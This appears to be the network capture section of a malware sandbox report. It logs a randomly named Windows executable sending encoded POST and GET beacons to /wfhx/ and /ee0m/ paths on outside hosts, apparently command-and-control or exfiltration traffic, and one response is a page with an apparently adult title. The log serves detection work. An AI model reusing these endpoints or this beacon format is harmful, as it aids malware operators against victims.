Jan 11, 2025 00:07:49.174200058 CET	1058	IN	HTTP/1.1 404 Not Found Date: Fri, 10 Jan 2025 23:07:49 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=izPwMVwOInAEKTSf5tHJCvEcM3yzNQe3J%2F4taaywv3RCrnajSxmHFYZmLoVaHVYyKo%2BCvLEoeXRWeHBDB715koEzPYnqb170XkdGwcCdmya7oxAQyYnZEWaYILh38X1ckr0B"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9000534f0db88cda-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1777&min_rtt=1777&rtt_var=888&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=496&delivery_rate=0&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 31 30 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 61 73 74 65 72 71 71 2e 70 72 6f 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 106<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.masterqq.pro Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.6	49998	13.248.169.48	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:54.281536102 CET	750	OUT	POST /wfhx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.shipley.group Origin: http://www.shipley.group Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 211 Cache-Control: max-age=0 Referer: http://www.shipley.group/wfhx/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 5a 4d 41 42 37 39 76 75 38 37 62 4e 44 57 70 4c 75 39 67 43 6d 2f 54 46 77 50 79 45 71 63 67 44 5a 37 33 2b 48 4c 57 68 4f 37 71 66 38 6f 39 49 58 65 67 2b 4a 67 4e 30 62 4a 48 4e 34 73 6e 44 2f 4f 30 44 4e 55 6d 66 33 4c 44 59 31 67 36 5a 49 76 53 50 53 69 45 74 6b 4e 45 44 34 30 58 71 6a 64 47 4c 6b 72 46 47 4b 5a 51 62 62 55 6b 36 65 63 71 33 36 73 67 68 69 64 4a 66 32 52 59 70 4f 2b 4d 6e 65 33 46 54 72 73 66 70 6f 74 51 56 4e 53 6a 56 4b 6c 38 4b 2f 43 6f 41 52 37 31 67 5a 39 4d 41 2f 32 57 69 51 77 41 69 4f 77 6c 76 72 6d 62 47 52 4c 55 6b 71 33 36 43 69 4f 54 69 67 64 50 73 49 39 75 79 7a 37 44 33 Data Ascii: kPJ4bZ=ZMAB79vu87bNDWpLu9gCm/TFwPyEqcgDZ73+HLWhO7qf8o9IXeg+JgN0bJHN4snD/O0DNUmf3LDY1g6ZIvSPSiEtkNED40XqjdGLkrFGKZQbbUk6ecq36sghidJf2RYpO+Mne3FTrsfpotQVNSjVKl8K/CoAR71gZ9MA/2WiQwAiOwlvrmbGRLUkq36CiOTigdPsI9uyz7D3
Jan 11, 2025 00:07:54.722337008 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.6	49999	13.248.169.48	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:56.838872910 CET	774	OUT	POST /wfhx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.shipley.group Origin: http://www.shipley.group Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 235 Cache-Control: max-age=0 Referer: http://www.shipley.group/wfhx/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 5a 4d 41 42 37 39 76 75 38 37 62 4e 43 7a 35 4c 73 63 67 43 6e 66 54 4b 38 76 79 45 2f 4d 67 48 5a 38 2f 2b 48 4f 76 6b 4f 70 2b 66 38 4d 35 49 57 61 30 2b 4b 67 4e 30 54 70 48 79 67 4d 6e 4d 2f 4f 35 2b 4e 56 61 66 33 50 54 59 31 67 71 5a 4a 59 47 51 54 79 45 34 73 74 45 42 6e 6b 58 71 6a 64 47 4c 6b 72 68 67 4b 5a 49 62 62 68 30 36 65 2b 53 30 37 73 67 75 31 74 4a 66 6e 42 59 6c 4f 2b 4d 46 65 32 5a 70 72 76 33 70 6f 73 67 56 4d 41 62 57 42 6c 38 49 31 69 70 77 65 37 59 31 58 2b 4d 45 34 41 48 43 4f 79 45 42 50 47 34 31 33 56 62 6c 44 62 30 6d 71 31 69 77 69 75 54 49 69 64 33 73 61 71 69 56 38 50 6d 55 75 43 47 77 6a 43 44 68 55 72 4d 57 39 67 6b 54 7a 6b 33 4e 55 41 3d 3d Data Ascii: kPJ4bZ=ZMAB79vu87bNCz5LscgCnfTK8vyE/MgHZ8/+HOvkOp+f8M5IWa0+KgN0TpHygMnM/O5+NVaf3PTY1gqZJYGQTyE4stEBnkXqjdGLkrhgKZIbbh06e+S07sgu1tJfnBYlO+MFe2Zprv3posgVMAbWBl8I1ipwe7Y1X+ME4AHCOyEBPG413VblDb0mq1iwiuTIid3saqiV8PmUuCGwjCDhUrMW9gkTzk3NUA==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.6	50000	13.248.169.48	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:07:59.398936033 CET	1787	OUT	POST /wfhx/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.shipley.group Origin: http://www.shipley.group Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1247 Cache-Control: max-age=0 Referer: http://www.shipley.group/wfhx/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 5a 4d 41 42 37 39 76 75 38 37 62 4e 43 7a 35 4c 73 63 67 43 6e 66 54 4b 38 76 79 45 2f 4d 67 48 5a 38 2f 2b 48 4f 76 6b 4f 70 47 66 38 5a 74 49 57 34 63 2b 4c 67 4e 30 4d 5a 48 4a 67 4d 6e 52 2f 50 52 36 4e 56 57 50 33 4e 62 59 30 44 79 5a 41 4b 2b 51 61 79 45 34 75 74 45 43 34 30 58 2f 6a 5a 69 50 6b 72 78 67 4b 5a 49 62 62 6d 4d 36 58 4d 71 30 32 4d 67 68 69 64 4a 44 32 52 59 4a 4f 2b 6c 34 65 32 63 4c 71 65 58 70 6d 73 77 56 50 31 33 57 49 6c 38 47 32 69 70 6f 65 37 56 6c 58 2b 52 2f 34 41 61 74 4f 79 41 42 4f 44 68 6a 6e 55 4c 2f 42 61 6b 77 71 6e 33 54 36 2b 66 2b 72 4c 7a 42 57 4b 2f 69 36 72 75 62 68 53 57 52 6d 42 6d 37 62 61 51 37 79 31 42 6c 35 57 58 48 48 59 39 57 77 57 7a 35 65 58 37 70 35 77 41 37 6d 31 38 61 75 63 64 42 70 66 66 57 63 47 43 56 47 62 33 72 59 75 66 70 52 36 51 33 41 54 4f 52 4f 41 76 4d 75 73 30 4a 4b 2f 36 30 53 47 43 75 31 59 2f 46 52 38 64 47 37 44 2f 34 38 68 6f 48 34 36 4a 74 66 56 61 50 4e 30 74 71 50 6d 2b 77 63 6b 6c 32 64 46 77 48 37 49 77 [TRUNCATED] Data Ascii: kPJ4bZ=ZMAB79vu87bNCz5LscgCnfTK8vyE/MgHZ8/+HOvkOpGf8ZtIW4c+LgN0MZHJgMnR/PR6NVWP3NbY0DyZAK+QayE4utEC40X/jZiPkrxgKZIbbmM6XMq02MghidJD2RYJO+l4e2cLqeXpmswVP13WIl8G2ipoe7VlX+R/4AatOyABODhjnUL/Bakwqn3T6+f+rLzBWK/i6rubhSWRmBm7baQ7y1Bl5WXHHY9WwWz5eX7p5wA7m18aucdBpffWcGCVGb3rYufpR6Q3ATOROAvMus0JK/60SGCu1Y/FR8dG7D/48hoH46JtfVaPN0tqPm+wckl2dFwH7Iw8iVHS2DMPDzjHJNTBRnTaZ8OYfXYyTeDt+lJ9DYFcEZfVYlQPJrgMQZkLj+n9ZF1Iq+QTXFa6HX3odERpowZ9/9nm43hOAtQ3QSAZnlL5Z5WHsfSX5fGF7djdi5BNBEHYsS0Q1KIHoimnWVimumiw9pRhK+jgtz0q3nm/djwwWO/sEVa5yJSoYJVPsdyvwuIhIOj60wEvy/ejpTsuKhYZm2hsObGQbPWkNgjpNqoIODwRoIvQjJ/rqn28nilONsMXB7+h4+3cW/zNKkgjOTf03VIhmY0h/LmjO2zyZ5ISWzCneqWF3DRcjctrirDPrsY1Bw/GJC0YjKo3L/vDE6QRy1ebfs90O53n6K3MIDwBiqMqqczNfGpzrk6/G6tzo7WAyxDi4G5CXpdlQQQ5DbjsCnf1UJUYXYsKZRXscZnjRwG5iW0NJfM7TMjJIGTmIruAtGLmXpJx5u9a6hPM3cXATxMHjMDS+tHfTZz8O5cWia7D0NO3iWIEjI0kkRfKEQ71kMqZv6U/VPlQu2rth15y+pWSKFQHh2zChTQbRGe7n/nAZwl1zR9NBokHLw0/u26neW1CD/4PS5qDVk0t9LOWhapJacTyDMoXuqkeNkKtPo0WyRdf3DTSZmxGopwqNJtVUeFIhaGypqU8tZbUml4ZN5YO0HgtSpAWs [TRUNCATED]
Jan 11, 2025 00:07:59.839626074 CET	73	IN	HTTP/1.1 405 Method Not Allowed content-length: 0 connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.6	50001	13.248.169.48	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:01.940201044 CET	497	OUT	GET /wfhx/?kPJ4bZ=UOoh4KWgwd2uK2Fv/Y1dgfL/8dbcrZUnUaCbH/KIeaCVkdBdb+xIXB95VKjrucq/x/UHPGjJtfXL4g7pUq+6Gw82pv1ZnniYkrWC0OZFP+5EUlQNbciF2fEf2sN//T48Iuc7ZyI=&cHdXN=988T3LsXMJJH2nc HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.shipley.group Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Jan 11, 2025 00:08:02.399178028 CET	401	IN	HTTP/1.1 200 OK content-type: text/html date: Fri, 10 Jan 2025 23:08:02 GMT content-length: 280 connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 6b 50 4a 34 62 5a 3d 55 4f 6f 68 34 4b 57 67 77 64 32 75 4b 32 46 76 2f 59 31 64 67 66 4c 2f 38 64 62 63 72 5a 55 6e 55 61 43 62 48 2f 4b 49 65 61 43 56 6b 64 42 64 62 2b 78 49 58 42 39 35 56 4b 6a 72 75 63 71 2f 78 2f 55 48 50 47 6a 4a 74 66 58 4c 34 67 37 70 55 71 2b 36 47 77 38 32 70 76 31 5a 6e 6e 69 59 6b 72 57 43 30 4f 5a 46 50 2b 35 45 55 6c 51 4e 62 63 69 46 32 66 45 66 32 73 4e 2f 2f 54 34 38 49 75 63 37 5a 79 49 3d 26 63 48 64 58 4e 3d 39 38 38 54 33 4c 73 58 4d 4a 4a 48 32 6e 63 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?kPJ4bZ=UOoh4KWgwd2uK2Fv/Y1dgfL/8dbcrZUnUaCbH/KIeaCVkdBdb+xIXB95VKjrucq/x/UHPGjJtfXL4g7pUq+6Gw82pv1ZnniYkrWC0OZFP+5EUlQNbciF2fEf2sN//T48Iuc7ZyI=&cHdXN=988T3LsXMJJH2nc"}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.6	50002	103.249.106.91	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:07.469392061 CET	744	OUT	POST /ee0m/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.8686206.xyz Origin: http://www.8686206.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 211 Cache-Control: max-age=0 Referer: http://www.8686206.xyz/ee0m/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 41 46 59 72 65 64 54 50 6e 45 35 73 63 59 4f 61 30 76 35 69 30 4b 74 4f 38 57 76 67 62 42 31 39 6f 50 69 6d 65 39 47 30 57 49 31 50 5a 35 59 78 4f 59 73 66 2b 69 4e 68 43 42 30 4f 2f 39 43 6c 7a 79 79 34 53 33 74 70 65 63 50 6f 54 56 32 57 61 57 47 68 4b 61 61 33 36 63 4f 77 6c 68 2b 45 36 4a 6c 36 76 6a 39 50 6c 57 4f 79 4e 53 56 4e 54 53 44 34 5a 4d 2b 47 34 58 68 53 54 2f 33 4c 58 58 37 44 57 57 4f 31 61 69 4b 4d 53 41 66 73 6d 43 59 47 6c 64 57 4d 64 38 46 4a 43 50 45 7a 48 4b 63 53 42 6b 30 43 74 77 46 38 37 31 4f 7a 7a 4a 52 64 6a 34 4f 33 78 36 54 57 63 41 42 2f 66 37 33 46 43 4b 59 69 64 6b 43 7a Data Ascii: kPJ4bZ=AFYredTPnE5scYOa0v5i0KtO8WvgbB19oPime9G0WI1PZ5YxOYsf+iNhCB0O/9Clzyy4S3tpecPoTV2WaWGhKaa36cOwlh+E6Jl6vj9PlWOyNSVNTSD4ZM+G4XhST/3LXX7DWWO1aiKMSAfsmCYGldWMd8FJCPEzHKcSBk0CtwF871OzzJRdj4O3x6TWcAB/f73FCKYidkCz
Jan 11, 2025 00:08:08.374489069 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Fri, 10 Jan 2025 23:08:08 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.6	50003	103.249.106.91	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:10.026108980 CET	768	OUT	POST /ee0m/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.8686206.xyz Origin: http://www.8686206.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 235 Cache-Control: max-age=0 Referer: http://www.8686206.xyz/ee0m/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 41 46 59 72 65 64 54 50 6e 45 35 73 61 37 57 61 7a 4d 52 69 79 71 74 4e 68 6d 76 67 55 68 31 35 6f 50 75 6d 65 35 66 70 4b 71 52 50 59 62 51 78 50 63 77 66 35 69 4e 68 4a 68 30 50 37 39 43 2b 7a 79 32 77 53 32 52 70 65 66 7a 6f 54 58 75 57 61 68 61 6d 49 4b 61 78 37 73 4f 79 72 42 2b 45 36 4a 6c 36 76 6a 6f 67 6c 57 57 79 4e 44 6c 4e 63 54 44 37 48 38 2b 48 75 48 68 53 58 2f 33 48 58 58 37 39 57 54 76 69 61 6b 4f 4d 53 43 58 73 6c 54 59 46 2b 4e 58 48 41 73 45 4a 4b 50 46 33 47 4a 52 67 4e 48 6b 2b 73 7a 64 73 36 44 54 70 76 36 52 2b 78 6f 75 31 78 34 4c 6b 63 67 42 56 64 37 50 46 51 64 55 46 53 51 6e 51 64 74 2b 53 68 44 63 76 50 4a 46 2b 50 4a 43 47 4d 65 6b 6a 47 51 3d 3d Data Ascii: kPJ4bZ=AFYredTPnE5sa7WazMRiyqtNhmvgUh15oPume5fpKqRPYbQxPcwf5iNhJh0P79C+zy2wS2RpefzoTXuWahamIKax7sOyrB+E6Jl6vjoglWWyNDlNcTD7H8+HuHhSX/3HXX79WTviakOMSCXslTYF+NXHAsEJKPF3GJRgNHk+szds6DTpv6R+xou1x4LkcgBVd7PFQdUFSQnQdt+ShDcvPJF+PJCGMekjGQ==
Jan 11, 2025 00:08:10.914371014 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Fri, 10 Jan 2025 23:08:10 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.6	50004	103.249.106.91	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:12.571090937 CET	1781	OUT	POST /ee0m/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Host: www.8686206.xyz Origin: http://www.8686206.xyz Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1247 Cache-Control: max-age=0 Referer: http://www.8686206.xyz/ee0m/ User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36 Data Raw: 6b 50 4a 34 62 5a 3d 41 46 59 72 65 64 54 50 6e 45 35 73 61 37 57 61 7a 4d 52 69 79 71 74 4e 68 6d 76 67 55 68 31 35 6f 50 75 6d 65 35 66 70 4b 71 5a 50 59 70 6f 78 4a 39 77 66 34 69 4e 68 41 42 30 30 37 39 44 2b 7a 30 65 30 53 32 64 35 65 61 2f 6f 43 43 36 57 52 30 75 6d 42 4b 61 78 2b 63 4f 78 6c 68 2f 45 36 4e 42 32 76 6a 34 67 6c 57 57 79 4e 42 74 4e 56 69 44 37 46 38 2b 47 34 58 68 57 54 2f 33 6a 58 58 6a 79 57 54 71 66 5a 55 75 4d 52 69 48 73 6a 68 77 46 6a 64 58 46 44 73 45 6e 4b 50 4a 34 47 4a 4d 52 4e 47 67 55 73 78 42 73 34 32 2b 67 31 34 4e 78 6d 70 43 33 76 70 2f 35 5a 58 35 57 61 64 54 74 41 2f 6f 46 4d 53 66 77 46 37 33 46 68 6a 6c 59 4d 71 31 48 46 75 4c 79 44 4e 46 75 64 42 4c 6c 67 59 55 31 59 57 59 46 64 72 5a 4d 47 76 49 4c 53 58 4b 4d 54 66 54 6d 37 4f 44 37 68 2f 57 35 41 59 69 50 4f 76 6d 53 6a 69 66 47 77 47 75 53 6e 61 79 31 71 6f 6d 67 2b 4a 52 6a 4d 34 77 55 61 61 39 33 69 52 38 61 67 39 43 4d 47 5a 46 49 6e 33 4b 44 41 58 72 67 44 70 4d 43 31 63 35 49 50 64 61 49 58 75 31 [TRUNCATED] Data Ascii: kPJ4bZ=AFYredTPnE5sa7WazMRiyqtNhmvgUh15oPume5fpKqZPYpoxJ9wf4iNhAB0079D+z0e0S2d5ea/oCC6WR0umBKax+cOxlh/E6NB2vj4glWWyNBtNViD7F8+G4XhWT/3jXXjyWTqfZUuMRiHsjhwFjdXFDsEnKPJ4GJMRNGgUsxBs42+g14NxmpC3vp/5ZX5WadTtA/oFMSfwF73FhjlYMq1HFuLyDNFudBLlgYU1YWYFdrZMGvILSXKMTfTm7OD7h/W5AYiPOvmSjifGwGuSnay1qomg+JRjM4wUaa93iR8ag9CMGZFIn3KDAXrgDpMC1c5IPdaIXu160QqhE9KKXX8Sj3w6uKErVoNMmO/+UzQAy7mKprSqhfs9xPZYh4DBL1qoOaxuMFlKoPuSNil0t7yZroODLeyukU/PzrXai1DixGGfjPZIKWd9pwclP2E2tJVyAgmeool4GEnKr3SQcOID7AF2P4hJiqmtzpGCAsx8jSv9vsI7ichmBatSjs+bowLF7R1k3QqvLgxg1Vnayqb+SGPBv3S6JFLmFX9uimkzXLmSuCbfy8Qb+EFEL/S8ROw5IJ32bcd5M0tzfRhuQp5lswqLnlbplHUzHQJfyAfkQ77vXLwL7VQKzDuu2xnDw4HVfXuYp/xOHBOByByXmQgydOCftkCTrmsuv/0i6CmQuRwJ/SFvy3/GuCoIQC+3rav08ylWepOH+akylT/8t2b71lYl/yqrGAjISBzOtF8gjF95CfIWZRYHLzTMhDGWWV/XXWyxs3SCymB47h2RC3anFt03W6DEKA6isuSykD6mToOU68lShs72sS+9X9HcJLa6FGuaoIgKxCGPN7Jb2WRLAB4oXL/omkYV+WClF/1XQ3F2x8Jpr0QqMmec93IkqKYxL+x9dwjWNcRg+z75zYO3Wu4yr4fc4lmWMm6E2Xuax3GKKNevc9qeJuhEdpy6VS4JI+MCNmv1kGrwDgQHkyqxnE9YGoVW0oQsE9ffOSuma [TRUNCATED]
Jan 11, 2025 00:08:13.466995001 CET	190	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Fri, 10 Jan 2025 23:08:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a Data Ascii: d404 Not Found0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.6	50005	103.249.106.91	80	992	C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe

Timestamp	Bytes transferred	Direction	Data
Jan 11, 2025 00:08:15.112289906 CET	495	OUT	GET /ee0m/?cHdXN=988T3LsXMJJH2nc&kPJ4bZ=NHwLdo+0jCxtc5CMzIw414F1hBe8Rgh0gZLzRNbcc711dto5H4xmohMbIzAu7+z3xUnofEY5EO/2HGiLPESvf5/iyPfqyBnB3f9+h0VfvTzsaTNCRAbWAe36t302UentalrYUm4= HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Host: www.8686206.xyz Connection: close User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; ALCATEL ONETOUCH P310A Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Safari/537.36
Jan 11, 2025 00:08:16.172775984 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 10 Jan 2025 23:08:16 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding Data Raw: 36 39 66 35 0d 0a ef bb bf 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 7a 68 2d 43 4e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 63 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 6e 64 65 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 66 6f 72 63 65 2d 72 65 6e 64 65 72 69 6e 67 22 20 63 6f 6e 74 65 6e 74 3d 22 77 65 62 6b 69 74 22 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 3c [TRUNCATED] Data Ascii: 69f5<!DOCTYPE html><html lang="zh-CN"><head><meta charset="utf-8" /><meta name="applicable-device" content="pc"><meta name="renderer" content="webkit"/><meta name="force-rendering" content="webkit"/><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/><meta name="viewport" content="width=device-width, initial-scale=1" /><meta http-equiv="Cache-Control" content="no-siteapp" /><meta http-equiv="Cache-Control" content="no-transform" /><title>蒂亚-免费夫妻大片在线看</title><meta name="keywords" content="蒂亚"><meta name="description" content="蒂亚"><meta name="referrer" content="always"><link type="text/css" href="http://www.8686206.xyz/template/news/newsblue/css/base.css" rel="stylesheet" /><link type="text/css" href="http://www.8686206.xyz/template/news/newsblue/css/common.css" rel="stylesheet" /></head><body><sup draggable="817c94"></sup><time dropzone="901c55"></time><tt date-time="c45efa"></tt [TRUNCATED]
